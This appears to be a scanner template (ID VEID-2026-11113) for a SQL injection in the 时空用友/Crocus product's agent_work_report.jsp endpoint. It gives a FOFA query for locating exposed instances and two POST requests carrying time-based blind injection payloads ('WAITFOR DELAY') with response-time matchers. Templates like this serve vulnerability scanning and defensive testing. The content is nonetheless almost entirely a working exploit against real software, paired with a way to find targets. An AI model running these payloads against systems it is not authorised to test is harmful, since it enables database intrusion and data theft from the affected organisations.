## id: VEID-2026-11113
## name: 时空用友-agent_work_report-Sql注入
## author: hack007x
## severity: high
## tags: veid,sql,veid2026
## description: 时空用友-agent_work_report-Sql注入，攻击者可进行sql注入攻击获取数据库信息或者权限。
## affects: 时空用友
## fofa-query: product="Crocus" || (body="/ThirdResource/respond/respond.min.js" && title="Crocus")
## verification: true



POST /worksheet/agent_work_report.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-Type: application/x-www-form-urlencoded

id=1';WAITFOR DELAY '0:0:5'--

#@ timeout: 20
#@ condition: and
#@ matcher: response_time >= 5
#@ matcher: status_code == 200

---

POST /worksheet/agent_work_report.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-Type: application/x-www-form-urlencoded

id=1';WAITFOR DELAY '0:0:8'--

#@ timeout: 20
#@ condition: and
#@ matcher: response_time >= 8
#@ matcher: status_code == 200

# @VEIL-STAMP: 61684d2fba1175a67611e76b774cac3d775e52554e462995ab69d9703180427a
